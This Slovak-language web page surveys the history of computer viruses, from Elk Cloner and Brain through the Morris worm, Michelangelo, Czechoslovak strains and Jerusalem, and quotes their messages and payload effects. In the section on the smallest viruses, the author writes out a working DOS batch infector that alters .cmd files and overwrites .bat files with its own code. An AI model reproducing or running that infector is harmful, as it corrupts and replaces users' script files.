Hacking

Malware - Detecting

Upload Malware

Doporučujeme














Naše Bannery








Toplist




Z histórie virov

 

Prvé viry

-- Prvým počítačovým virom bol Elk Cloner a nie BRAIN, ako to väčsina tvrdila. Virus BRAIN bol napísaný o niekoľko rokov.

Vir Elk Cloner vytvoril Richard Skrenta okolo roku 1982 v Mont Lebanone (USA). Bol to boot virus určený pre platformu
Apple II. Pri spustení vypísal hlášku:



ELK CLONER:

THE PROGRAM WITH A PERSONALITY

IT WILL GET ON ALL YOUR DISKS
IT WILL INFILTRATE YOUR CHIPS
YES IT´S CLONER!

IT WILL STICK TO YOU LIKE GLUE
IT WIIL MODIFY RAM TOO
SEND IN THE CLONER!



Časť zdrojáku z ELK: kód



-- Ďaľším virom z pomedzi tých prvých bol virus Brain . Vytvorili ho dvaja bratia Basit Farooq Alvi a Amjad Farooq Alvi

z Pakistanu v januáry roku 1986. Bol to pamäťovo rezidentný stealth boot infector - infikoval boot sektory FAT tabuliek
diskov (diskety) hooknutím INT13, pričom pozmenil volume label na "(c) brain" alebo "(c) ashar" a na disketách
označil 3 KB clusterov ako chybných.

Vírus obsahoval správu:

Welcome to the Dungeonv
(c) 1986 Basit & Amajd (ptv) Ltd.
BRAIN COMPUTER SERVICES
7360 Nizam Block Allama
Iqbal Town
Lahore, Pakistan
Phone: 430791, 443248, 280530
Beware of this VIRUS
Contact us for vaccination


Modifikovaný sektor obsahoval text:


Welcome to Dungeon
(c) 1986 Brain & Amjads (pvt) Ltd
VIRUS_SHOE RECORD v9.0
Dedicated to dynamic memories
of millions of virus who are no longer with us
today - Thanks GOODNESS!!
BEWARE OF THE er..VIRUS: this program is catching
program follows after these messages..... $#@%$@!!



Autori Braina uverejnili v správe svoje kontaktné údaje pomocou ktorých ich rýchlo odhalily.
Iróniou bolo to, že sa k viru prví dostali ľudia, ktorí nakupovali u týchto bratov nelegálny software.

Ďaľšie aliasy viru : Ashar, (C) Brain, Clone, Nipper, Pakistani virus, Pakistani Brain, Pakistani Flu, Lahore virus, UIUC.




Najväčšie škody

-- Najväčšie škody spôsobil asi jeden z prvých a zároveň najznámejších červov, ktorý vytvoril druhého novembra v roku

1988 vtedy 23 ročný študent Robert Tappan Morris. Morris zneužil otcové poznatky o slabých miestach v zabezpečení
unixových sietí a ukázal, ako ľahko sa dajú zneužiť. Worm napadol vyše 6000 počítačov bežiacich pod unixom, pričom
zablokoval sieť na vyše ako 36 hodín. Celková škoda dosiahla hranicu približne $ 100 000 000.
Morris bol v roku 1990 uznaný vinným a odsúdený na tri roky nepodmienečne + musel uhradiť peňažnú pokutu vo
výške $ 10 000.




Najznámejší vírus

-- Prílišnú popularitu svojho času mal vir Michelangelo. Písalo sa o ňom všade u nás aj v zahraničí. Články vychádzali v

dennej tlači, odborných časopisoch, hovorilo sa o ňom v televízií a rozhlase. Práve takáto možno až chorá popularita
naštartovala iných tvorcov virov, ktorí zatúžili byť takýmto spôsobom populárni.

Michelangelo bol vir, ktorý sa pri spustení nakopíroval do MBR disku. Pôvodný partičný sektor MBR presunul na
cilinder 0 - hlava 0 - sektor 7 . Po vložení 360 KB diskiet Michelangelo prepísal prvý boot sektor, pričom pôvodný boot
sektor presunul na cilinder 0 - hlava 1 - sektor 3 , u väčších diskiet na cilinder 0 - hlava 1 - sektor 14. 6. marca prepísal
prvé sektory diskov nulami.
Objavený bol v apríli roku 1991, pochádza z Holandska.


Zdrojové kódy Michelangela: kód1 | kód2



Najmenší vírus

-- Najmenším virom je podľa všetkého TrivialOW.13, patriaci do skupiny Trivial. Má len 13 Bytov. Pri spustení vir infikuje

prvý súbor, ktorý sa nacháda v aktuálnom adresári ako vir. Tak ako celá skupina Trivial, infikuje executable súbory s
koncovkami .exe a .com .

V minulosti prakticky väčsina virov boli file infecktory. Viac-menej nie je také ťažké napísať nejakého. Ja som si zvolil
prostredie DOSU:


@prompt $
for %%f in (*.cmd) do (
for %%a in (%time%) do (
echo.D%%aI%%aA%%aL%%aL%%aI%%aX is here!>sft)
type sft>>%%f
del sft)
for %%h in (*.bat) do (
find "D~I?" < %%~h >nul
if errorlevel 1 type %0>%%~h)



Ako je zrejmé ide o file infectora .bat a .cmd suborov, ktorý ich infikuje v aktuálnom priečinku ako je vir. Má 217 bytov
a jeho vyvorenie trvalo tri minúty :).




Naše viry

-- Dávnejšie som sa dostal k niekoľkým virom, ktoré pochádzajú od nás, respektíve z Československa. Bolo by chybou ich

tu neuverejniť.


Semtex -- Bol vytvorený v septembri roku 1991. Ide o rezidentný file infector súborov .com vrátane systémového

súboru command.com. Zujímavosť tochto viru spočíva v tom, že pri infikovaní určitého počtu súborov
alebo po uplinutí určitého času, náhodne zobrazil na obrazovke farebné znaky.

Vírus obsahoval v jednotlivých variantách následovné texty:

Semtex.512. Semtex.619, Semtex.1000a: SEMTEX by Dusan Toman, CZECHOSLOVAKIA
(7)213-040 or (894)212-23

Semtex.686: !!! explosive !!! SEMTEX !!! explosive !!! Written by Dusan Toman, CZECHOSLOVAKIA
Pyrotechnician Lilo Hedera (7)213-040 or (894)212-23

Semtex.1000b: SEMTEX by Dusan Toman, CZECHOSLOVAKIA *** Have a nice day ***



Backtime -- Bol vytvorený v auguste 1991 v Prahe. Jeho známe aliasy sú: Shaker, Joker, Blinker. Je to file infector

napadajúci .com súbory, pričom do nich vloží hodnotu "Shaker" alebo "Backtime". Vir začne infekciu len
v tom prípade,že nie je poškodený systémový súbor command.com.

Shaker -- táto varianta spôsobovala "shaking" efekt - roztrasenie obrazovky.

Blinker -- táto varianta rozblikala po určitom čase monitor.

Joker -- joker sa spúšťal viacej ako 18x za sekundu, čo viedlo k preťaženiu zásobíka dočasnej pamäti,
v niektorých prípadoch k jej poškodeniu. Preťaženie zásobníka spôsobovalo nesprávny beh
programov.



Slovakia -- Polymorfný file infector pochadzajúci zo Slovenska. Hookuje INT 21h, pričom napáda .exe

(niektoré varianty aj .com) súbory.Celkovo boli vypustené 4 varianty tochto viru.

Vírus od 1.1 do 8.1 vypísal hlášky:


Greeting from Bratislava, Slovakia.
Type the word SLOVAKIA:
Slovakia virus version 2.00 (c) 1991 by SVL. All Rights Reserved.
Type word SLOVAKIA, not CZECH, YUGOSLAVIA or SLOVENIA !!
Press ESC.
Msg #0 to Slon! & Kuko. Hi, pleased to meet your program. Enjoy new version of S. Bye

HAPPY NEW YEAR, SLOVAKIA!


Ako je zrejmé, autorovi viru nešlo o to škodiť užívateľom, ale dostať sa do povedomia na virovej scéne.



Milena -- Vírus bol vytvorený 5 januára v roku 1991. Podľa dokumentácie McAfee ide o file infector, ktorý neškodil iba

propagoval samého seba (podobne ako Slovakia). Do vnúra infikovaných súborov vkladal názvy:

"LOVE"
"I Love Milena"


Názov "MILENA" si autor pravdepodobne zvolil podľa obľúbenej tyčinky Milena.




Ďaľšie viry

-- Prehľad ďaľších zaujímavých kúskov.

Dark Avenger -- je to polymorfný file infector napadajúci .exe a .com súbory. Do súborov vkladá 1800 Bytov. Vírus
infikuje súbory pri kopírovaní, pri čítaní, prí zápise, pri spustení a pri zmene attributov. Niektoré
varianty obnovovali vírus Anthrax (ak bol prv vyliečený) z posledných sektorov na disku. Navyše
mazal náhodne zvolený sektor na disku, čo viedlo k odmazaniu a stráte dát, ak na ňom boli.
Oficiálne bolo niekoľko verzií tochto viru.

Jednotlivé verzie obsahovali v zdrojáku niektorý z nižšie uvedených textov:


Diana P.

Eddie lives... somewhere in time!

Copy me - I want to travel

Eddie Lives

Only the Good die young

This program was written in the city of Sofia (C) 1988-89 Dark Avenger

Copyright (C) 1989 by Vesselin Bontchev



Ďaľšie aliasy viru : Eddie, Black Avenger, Diana, Travell virus, Apocalypse, Die Young.
Bol vytvorený v roku 1989 a pochádza z Bulharska.
Asi málokto vie,že autor dal viru názov Eddie podľa maskota skupiny Iron Maiden.

Tvorca viru Dark Avenger uverejnil niekedy začiatkom roku 1991 na sieti FidoNet správu, v ktorej
oznámil, že vytvorí ďaľšie viry. Na veľký nesúhlas užívateľov odpovedal hanlivými správami. Presne
o rok vypustil dva viry Dedicated a Pogue. Pogue obsahoval časti virov Dark Avenger a Yankee
Doodle.x

Rozhovor so samotným autorom Dark Avengeru si môžete prečítať tu: interview



Vienna -- File infector napadajúci .com súbory. Infikované súbory majú v časovom označení hodnotu "62". Celkovo
jeden z piatich súborov sa pri infikovaní zničil, nakoľko vírus prepísal na začiatku programu 5 Bytov
hodnotou hex, čím program pri spustení začal bootovať.
Vírus Vienna, mal nespočetne veľa variant, ktoré nepochádzali od pôvodného autora. Za následok to malo
uverejnenie zdrojových kódov virov, vrátane Vienny Ralphom Burgerom v jeho knihe. Keď bola vyhlásená
súťaž o najmenší vírus, vírus Vienna bol jedným na ktorý sa programátori zamerali.
Niektoré varianty formátovali disk, ničili sektory alebo schválne ničili súbory. Keďže išlo o masové
upravovanie a dodatočné vytváranie zdrojákov Vienny, nebolo možné presne určiť ako si ho autori doladili.

Podrobný rozpis jednotlivých variant je tu: popisy

Pôvodný vírus Vienna bol vytvorený niekedy v Apríli roku 1988 v Rakúsku.



    Chameleon -- Je vôbec ako prvý polymorfný vírus. Infikoval .exe a .com súbory. Do infikovaných súborov vkladal kód

o velikosti 1260 bytov. Bolo vypustených viacero variant tochto viru, ale pôvodný vírus bol napísaný
v máji 1991 a pochádza z Viedne.




Jerusalem -- Polymorfný file infector napadajúci .exe a .com súbory, okrem súboru command.com. Vírus hookuje
INT 8h, INT 9, INT 16h a INT 21h. Pri hooknutí INT 21h často dochádzalo ku kolízií pri práci v sieti, čo
spôsobovali funkcie : 0D8h, 0CFh, 0E0h, 0B8H, 9Dh, 0FCh, 0DEh, 3Dh, ... . Vírus približne 30 minút po
spustení začne nadmerne preťažovať RAM, čo za nejaký čas spôsobí totálne spomalenie systému.
V piatok 13 vírus zmaže každý program, ktorý bol v tento deň spustený.
Je viacero variant viru Jerusalem, ktoré majú zadefinovaný iný čas mazania súborov ako v piatok 13.,
napr. Streda 13., Sobota 13., Utorok 1., Utorok 13, 25. januára a podobne.
Jedna varianta viru Jerusalem - Czech pochádza z Českej republiky.

Jednotlivé verzie viru vypisovali alebo obsahovali niektoré z nižšie uvedených textov:


MIKY 786290 B livia

CopyRight (C) 1988 - 1989 by ABT Group

Virus RAQUEL v.9 (C) IMV Galicia ´94

Captain Trips

SpitFire

CARFIELD!

Apocalypse!!



Jerusalem bol vytvorený koncom roku 1987 na Hebrewovej univerzite v Izraeli.

Zdrojové kódy Jerusalemu: kód1 | kód2


Slayer -- Vírus Slayer alebo "zabijak" patrí do širokej rodiny Slayer´s Family. Ide o súborový vírus napadajúci .com a
.exe súbory. Vírus infikuje súbory, ktoré sú v rovnakom adresári ako vir. Varianta Slayer-A napáda súbory
na celom disku. Krátko po spustení vir začne náhodne zapisovať a mazať údaje na disk, čím ho zaťaží a
systém mrzne. Objavili sa aj varianty "zabijaka", ktoré prepisovali MBR sektor.

Slayo v kóde obsahoval reťazec:


KEYB٭.COM  KEYB٭.EXE  BASRUN  BRUN  COBRUN  NETsOS  ٭.COM  IBMBIO.COM  IBMDOS.COM
COMMAND.COM  ٭.٭  ..\.. *.EXE   ACCESS DENIED.  ٭.EXE


Varianta Slayer-E niesla v sebe vírus Yankee Doodle, ktorý vrátane seba aktivoval. Yankee Doodle patrí
taktiež medzi file infectory. Každý deň o 17:00 zahral melódiu Yankee Doodle. Posledné vypustené verzie
Yankee Doodle ničili viry Italian, Cascade a Ping-Pong.

Vírus Slayer bol vytvorený asi 1. mája v roku 1991. Pochádza z U.S.A..



-- Niektoré z virov okrem infikovania súborov, či prepísania MBR zobrazovali po nákaze (niektoré aj pre ´Good Bye´) na
obrazovke grafické objekty s cielom "pobaviť" obeť. Objekty mali tvar od postavičiek až po nezmyselné, náhodné
zobrazené pixely.

Najznámejšie z nich:

Cascade - Vírus zobrazoval padajúce písmená doprevadzajúcim zvukovým efektom.

Frodo - Vírus na monitore zobrazil čierny rámik s textom "FRODO LIVES". Pôvodne obsahuje viacero efektov, no
nie všetky správne fungovali.

Italian - Vírus zobrazoval niekoľko pixelovú bodku pohybujúcu sa po monitore.

Kuku - Po spustení virus "rozbil" a rozložil pôvodný obraz monitora na chaoticko usporiadané obdĺžniky a štvorce
rôzných farieb, pričom preblikovali nápisy "Kuk KUKU!"

Marburg - Vírus monitor zahltil červenými kruhmi s bielým X uprostred.

Marine - Po spustení sa pôvodná obrazovka stratila a v grafickom režime sa objavilo more s malou loďkou.

Ping-Pong - Po spustení viru sa na obrazovke objavila malá, skákajúca lopta zo strany na stranu.

Possessed - Vírus zobrazil na obrazovke vyškerenú tvár diabla.

Teguila - Vírus zobrazoval obrázok pomocou rekurzie z náhodne poskladaných pixelov.

Walker - Vírus zobrazil na monitore pohybujúcu sa postavičku s mečom.


Popisy a ukážky niektorých z nich nájdete tu: článok_1
článok_2


















SPAŤ

 

 
Joomla ACL by AceACL